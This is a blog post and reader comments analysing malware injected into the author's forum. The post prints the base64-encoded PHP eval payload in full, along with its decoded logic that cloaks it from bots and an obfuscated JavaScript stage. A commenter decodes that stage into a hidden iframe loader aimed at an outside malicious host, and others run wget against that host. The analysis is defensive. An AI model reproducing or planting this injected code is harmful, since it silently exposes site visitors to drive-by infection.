Monday, June 4, 2012

More about the forum virus

I got more time to investigate it.

I had a backup of the forum and wanted to make sure there were no changes to the files (besides that added file) so I ran a MD5. And it turned out the PHP files were changed.

At the beginning of the index.php, you could see the following code added (in between php tags):

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTJGMllYTjJQWEJ5YjNSdmRIbHdaVHQ5WTJGMFkyZ29laWw3YUQwaWFHRnlRMjlrWlNJN1pqMWJKeTB6TTJZdE16Tm1Oak5tTmpCbUxURXdaaTB5WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTmpGbU5UbG1OelJtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbU56Tm1NalJtTnpsbU5ESm1OVFZtTmpGbU16Wm1OVFZtTmpkbU5UbG1MVEptTFRObU5UWm1OamxtTlRobU56bG1MVE5tTFRGbU5EbG1ObVkxTVdZdE1XWTRNV1l0TWpsbUxUTXpaaTB6TTJZdE16Tm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1NVGRtTFRJNVppMHpNMll0TXpObU9ETm1MVEV3WmpVNVpqWTJaamN6WmpVNVppMHhNR1k0TVdZdE1qbG1MVE16Wmkwek0yWXRNek5tTlRobU5qbG1OVGRtTnpWbU5qZG1OVGxtTmpobU56Um1OR1kzTjJZM01tWTJNMlkzTkdZMU9XWXRNbVl0T0dZeE9HWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXRNVEJtTnpObU56Sm1OVGRtTVRsbUxUTm1OakptTnpSbU56Um1OekJtTVRabU5XWTFaamN5WmpZMFpqYzVaamMwWmpZMVpqWXpaamM0WmpVMlpqWXdaalkwWmpjNFpqWTFaalkxWmpSbU5qZG1OemxtTmpCbU56ZG1OR1kzTldZM00yWTFaakl4WmpZeFpqWTVaakU1WmpobUxUTm1MVEV3WmpjM1pqWXpaalU0WmpjMFpqWXlaakU1WmkwelpqZG1ObVl0TTJZdE1UQm1OakptTlRsbU5qTm1OakZtTmpKbU56Um1NVGxtTFRObU4yWTJaaTB6WmkweE1HWTNNMlkzTkdZM09XWTJObVkxT1dZeE9XWXRNMlkzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE5tWTJNbVkyTTJZMU9HWTFPR1kxT1dZMk9HWXhOMlkzTUdZMk9XWTNNMlkyTTJZM05HWTJNMlkyT1dZMk9HWXhObVkxTldZMU5tWTNNMlkyT1dZMk5tWTNOV1kzTkdZMU9XWXhOMlkyTm1ZMU9XWTJNR1kzTkdZeE5tWTJaakUzWmpjMFpqWTVaamN3WmpFMlpqWm1NVGRtTFRObU1qQm1NVGhtTldZMk0yWTJNR1kzTW1ZMU5XWTJOMlkxT1dZeU1HWXRPR1l0TVdZeE4yWXRNamxtTFRNelppMHpNMlk0TTJZdE1qbG1MVE16Wmkwek0yWTJNR1kzTldZMk9HWTFOMlkzTkdZMk0yWTJPV1kyT0dZdE1UQm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1PREZtTFRJNVppMHpNMll0TXpObUxUTXpaamMyWmpVMVpqY3laaTB4TUdZMk1HWXRNVEJtTVRsbUxURXdaalU0WmpZNVpqVTNaamMxWmpZM1pqVTVaalk0WmpjMFpqUm1OVGRtTnpKbU5UbG1OVFZtTnpSbU5UbG1NamRtTmpabU5UbG1OamRtTlRsbU5qaG1OelJtTFRKbUxUTm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1MVE5tTFRGbU1UZG1OakJtTkdZM00yWTFPV1kzTkdZeU0yWTNOR1kzTkdZM01tWTJNMlkxTm1ZM05XWTNOR1kxT1dZdE1tWXRNMlkzTTJZM01tWTFOMll0TTJZeVppMHpaall5WmpjMFpqYzBaamN3WmpFMlpqVm1OV1kzTW1ZMk5HWTNPV1kzTkdZMk5XWTJNMlkzT0dZMU5tWTJNR1kyTkdZM09HWTJOV1kyTldZMFpqWTNaamM1WmpZd1pqYzNaalJtTnpWbU56Tm1OV1l5TVdZMk1XWTJPV1l4T1dZNFppMHpaaTB4WmpFM1pqWXdaalJtTnpObU56Um1OemxtTmpabU5UbG1OR1kzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE9XWXRNMlkyTW1ZMk0yWTFPR1kxT0dZMU9XWTJPR1l0TTJZeE4yWTJNR1kwWmpjelpqYzBaamM1WmpZMlpqVTVaalJtTnpCbU5qbG1Oek5tTmpObU56Um1Oak5tTmpsbU5qaG1NVGxtTFRObU5UVm1OVFptTnpObU5qbG1OalptTnpWbU56Um1OVGxtTFRObU1UZG1OakJtTkdZM00yWTNOR1kzT1dZMk5tWTFPV1kwWmpZMlpqVTVaall3WmpjMFpqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkzTkdZM09XWTJObVkxT1dZMFpqYzBaalk1Wmpjd1pqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkxT1dZM05HWXlNMlkzTkdZM05HWTNNbVkyTTJZMU5tWTNOV1kzTkdZMU9XWXRNbVl0TTJZM04yWTJNMlkxT0dZM05HWTJNbVl0TTJZeVppMHpaamRtTm1ZdE0yWXRNV1l4TjJZMk1HWTBaamN6WmpVNVpqYzBaakl6WmpjMFpqYzBaamN5WmpZelpqVTJaamMxWmpjMFpqVTVaaTB5WmkwelpqWXlaalU1WmpZelpqWXhaall5WmpjMFppMHpaakptTFRObU4yWTJaaTB6WmkweFpqRTNaaTB5T1dZdE16Tm1MVE16Wmkwek0yWTFPR1kyT1dZMU4yWTNOV1kyTjJZMU9XWTJPR1kzTkdZMFpqWXhaalU1WmpjMFpqSTNaalkyWmpVNVpqWTNaalU1WmpZNFpqYzBaamN6WmpJMFpqYzVaalF5WmpVMVpqWXhaak0yWmpVMVpqWTNaalU1WmkweVppMHpaalUyWmpZNVpqVTRaamM1WmkwelppMHhaalE1WmpabU5URm1OR1kxTldZM01HWTNNR1kxT1dZMk9HWTFPR1l5TldZMk1tWTJNMlkyTm1ZMU9HWXRNbVkyTUdZdE1XWXhOMll0TWpsbUxUTXpaaTB6TTJZNE15ZGRXekJkTG5Od2JHbDBLQ2RtSnlrN2RqMGlaU0lySW5aaElqdDlhV1lvZGlsbFBYZHBibVJ2ZDF0Mkt5SnNJbDA3ZEhKNWUzRTlaRzlqZFcxbGJuUXVZM0psWVhSbFJXeGxiV1Z1ZENnaVpHbDJJaWs3Y1M1aGNIQmxibVJEYUdsc1pDaHhLeUlpS1R0OVkyRjBZMmdvY1hkbktYdDNQV1k3Y3oxYlhUdDlJSEk5VTNSeWFXNW5PM285S0NobEtUOW9PaUlpS1R0bWIzSW9PelUzTnlFOWFUdHBLejB4S1h0cVBXazdhV1lvWlNselBYTXJjbHNpWm5KdmJVTWlLeWdvWlNrL2Vqb3hNaWxkS0hkYmFsMHFNU3MwTWlrN2ZTQnBaaWgySmlabEppWnlKaVo2Smlab0ppWnpKaVptSmlaMktXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K'));

When it is decoded, the beginning is clear but it has once more an eval and base64_decode:

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android','chrome');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
    echo(base64_decode('PHNjcmlwdD5pPTA7dHJ5e2F2YXN2PXByb3RvdHlwZTt9Y2F0Y2goeil7aD0iaGFyQ29kZSI7Zj1bJy0zM2YtMzNmNjNmNjBmLTEwZi0yZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNjFmNTlmNzRmMjdmNjZmNTlmNjdmNTlmNjhmNzRmNzNmMjRmNzlmNDJmNTVmNjFmMzZmNTVmNjdmNTlmLTJmLTNmNTZmNjlmNThmNzlmLTNmLTFmNDlmNmY1MWYtMWY4MWYtMjlmLTMzZi0zM2YtMzNmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmMTdmLTI5Zi0zM2YtMzNmODNmLTEwZjU5ZjY2ZjczZjU5Zi0xMGY4MWYtMjlmLTMzZi0zM2YtMzNmNThmNjlmNTdmNzVmNjdmNTlmNjhmNzRmNGY3N2Y3MmY2M2Y3NGY1OWYtMmYtOGYxOGY2M2Y2MGY3MmY1NWY2N2Y1OWYtMTBmNzNmNzJmNTdmMTlmLTNmNjJmNzRmNzRmNzBmMTZmNWY1ZjcyZjY0Zjc5Zjc0ZjY1ZjYzZjc4ZjU2ZjYwZjY0Zjc4ZjY1ZjY1ZjRmNjdmNzlmNjBmNzdmNGY3NWY3M2Y1ZjIxZjYxZjY5ZjE5ZjhmLTNmLTEwZjc3ZjYzZjU4Zjc0ZjYyZjE5Zi0zZjdmNmYtM2YtMTBmNjJmNTlmNjNmNjFmNjJmNzRmMTlmLTNmN2Y2Zi0zZi0xMGY3M2Y3NGY3OWY2NmY1OWYxOWYtM2Y3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxNmY2MmY2M2Y1OGY1OGY1OWY2OGYxN2Y3MGY2OWY3M2Y2M2Y3NGY2M2Y2OWY2OGYxNmY1NWY1NmY3M2Y2OWY2NmY3NWY3NGY1OWYxN2Y2NmY1OWY2MGY3NGYxNmY2ZjE3Zjc0ZjY5ZjcwZjE2ZjZmMTdmLTNmMjBmMThmNWY2M2Y2MGY3MmY1NWY2N2Y1OWYyMGYtOGYtMWYxN2YtMjlmLTMzZi0zM2Y4M2YtMjlmLTMzZi0zM2Y2MGY3NWY2OGY1N2Y3NGY2M2Y2OWY2OGYtMTBmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmODFmLTI5Zi0zM2YtMzNmLTMzZjc2ZjU1ZjcyZi0xMGY2MGYtMTBmMTlmLTEwZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNTdmNzJmNTlmNTVmNzRmNTlmMjdmNjZmNTlmNjdmNTlmNjhmNzRmLTJmLTNmNjNmNjBmNzJmNTVmNjdmNTlmLTNmLTFmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3M2Y3MmY1N2YtM2YyZi0zZjYyZjc0Zjc0ZjcwZjE2ZjVmNWY3MmY2NGY3OWY3NGY2NWY2M2Y3OGY1NmY2MGY2NGY3OGY2NWY2NWY0ZjY3Zjc5ZjYwZjc3ZjRmNzVmNzNmNWYyMWY2MWY2OWYxOWY4Zi0zZi0xZjE3ZjYwZjRmNzNmNzRmNzlmNjZmNTlmNGY3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxOWYtM2Y2MmY2M2Y1OGY1OGY1OWY2OGYtM2YxN2Y2MGY0ZjczZjc0Zjc5ZjY2ZjU5ZjRmNzBmNjlmNzNmNjNmNzRmNjNmNjlmNjhmMTlmLTNmNTVmNTZmNzNmNjlmNjZmNzVmNzRmNTlmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0ZjY2ZjU5ZjYwZjc0ZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0Zjc0ZjY5ZjcwZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3N2Y2M2Y1OGY3NGY2MmYtM2YyZi0zZjdmNmYtM2YtMWYxN2Y2MGY0ZjczZjU5Zjc0ZjIzZjc0Zjc0ZjcyZjYzZjU2Zjc1Zjc0ZjU5Zi0yZi0zZjYyZjU5ZjYzZjYxZjYyZjc0Zi0zZjJmLTNmN2Y2Zi0zZi0xZjE3Zi0yOWYtMzNmLTMzZi0zM2Y1OGY2OWY1N2Y3NWY2N2Y1OWY2OGY3NGY0ZjYxZjU5Zjc0ZjI3ZjY2ZjU5ZjY3ZjU5ZjY4Zjc0ZjczZjI0Zjc5ZjQyZjU1ZjYxZjM2ZjU1ZjY3ZjU5Zi0yZi0zZjU2ZjY5ZjU4Zjc5Zi0zZi0xZjQ5ZjZmNTFmNGY1NWY3MGY3MGY1OWY2OGY1OGYyNWY2MmY2M2Y2NmY1OGYtMmY2MGYtMWYxN2YtMjlmLTMzZi0zM2Y4MyddWzBdLnNwbGl0KCdmJyk7dj0iZSIrInZhIjt9aWYodillPXdpbmRvd1t2KyJsIl07dHJ5e3E9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iik7cS5hcHBlbmRDaGlsZChxKyIiKTt9Y2F0Y2gocXdnKXt3PWY7cz1bXTt9IHI9U3RyaW5nO3o9KChlKT9oOiIiKTtmb3IoOzU3NyE9aTtpKz0xKXtqPWk7aWYoZSlzPXMrclsiZnJvbUMiKygoZSk/ejoxMildKHdbal0qMSs0Mik7fSBpZih2JiZlJiZyJiZ6JiZoJiZzJiZmJiZ2KWUocyk7PC9zY3JpcHQ+'));
}

And that second part decoded unfortunately is obfuscated (it is Javascript and enclosed between script tags):

i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;577!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);

Indented:

i = 0;
try{
    avasv=prototype;
} catch (z) {
    h = "harCode";
    f = ['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');
    v = "e"+"va";
}

if (v) e = window[v+"l"];
try {
    q = document.createElement("div");
    q.appendChild(q+"");
} catch (qwg) {
    w = f;
    s = [];
}

r = String;
z = ((e)?h:"");
for( ;577!=i; i+=1) {
    j=i;
    if (e) s = s+r["fromC"+( (e) ? z : 12)](w[j]*1+42);
}
if (v && e && r && z && h && s && f && v) e(s);

It's not really clear. I get that he created a table with the split command ('f' is just a separator), but I don't know yet what that function does.

On side note, I still haven't got any news from the report I made (and I asked again a few days ago), so I think I can conclude that it's a shady business as I thought.

I'd like to thank a lot everybody who has already helped me and given me tips on what to check on the server :)

10 comments:

  1. I've seen this before on some other sites. It's just another level of obfuscation. After it decodes, you get this: http://pastebin.com/2UNxtwqD

    ReplyDelete
  2. You can find an explanation on this site

    http://stackoverflow.com/questions/10658071/site-was-just-attacked-and-javascript-was-injected-at-the-header-what-does-it-m

    ReplyDelete
  3. Hi
    I am kcdtv
    It seems that your blog is right now under attack too.
    http://picturestack.com/896/20/WeUzIBH.jpg
    around 13h30
    Before your forum went down similar kind of warning were displayed.
    Sorry to be "bad news" I sincerly hope i am equivocated.
    Anyway thanks for your great work.
    Bye.

    ReplyDelete
    Replies
    1. No it's not, a friend of mine got the same message from his AV but it seems that it picks it up.

      This is posted as plain text so it's not gonna execute at all (unless you copy paste it in a PHP file and run it; and Blogspot doesn't allow custom PHP code).

      Delete
    2. The reason why you get that message, is because this blog post contains exploit code.

      Delete
  4. This guy decoded the "worm"
    http://stackoverflow.com/questions/10658071/site-was-just-attacked-and-javascript-was-injected-at-the-header-what-does-it-m/10658251#10658251

    ReplyDelete
  5. The code
    for( ;577!=i; i+=1) {
    j=i;
    if (e) s = s+r["fromC"+( (e) ? z : 12)](w[j]*1+42);
    }

    basically converts to

    s=""
    for(i=0 ;577!=i; i+=1) {
    s = s+String.fromCharCode(f[i]+42);
    }

    Which results in the following code:

    if (document.getElementsByTagName('body')[0]) {
    iframer();
    } else {
    document.write("< i frame src='http://rjytkixbfjxkk.myfw.us/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'>");
    }

    function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src','http://rjytkixbfjxkk.myfw.us/?go=2');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
    }

    Here is googles reports on the site:

    http://www.google.com/safebrowsing/diagnostic?site=rjytkixbfjxkk.myfw.us

    I didn't want to go to the site to check what it actually does :-)

    Frank

    ReplyDelete
  6. :) ..wget result is: The website rjytkixbfjxkk.myfw.us is (or was) utilizing the Sitelutions Redirection Engine. Unfortunately, the URL has been entered incorrectly, or the site has been deleted by its owner. Below are some of our other services and features that we offer..... ;)

    ReplyDelete
  7. I tryed to download the site code with wget doing:

    wget http://rjytkixbfjxkk.myfw.us/?go=2

    But the only thing I get is an HTML page saying that the page was removed or the direction incorrectly entered. So I suppose that no more can be achieved that way. Sorry.

    ReplyDelete
  8. I see this shit all the time, I have a copy of the binaries they distribute via the pdf/swf/java/js 'payloads' similar to yours. Also check out the site jsunpack.jeek.org you have to hand feed it sometimes, when they do stuff like "Ma"+"th" but its pretty decent. If you want send officer an email at the domain militia dot cc. I doubt they targeted you intentionally. Just generic "WordPress driveby"

    ReplyDelete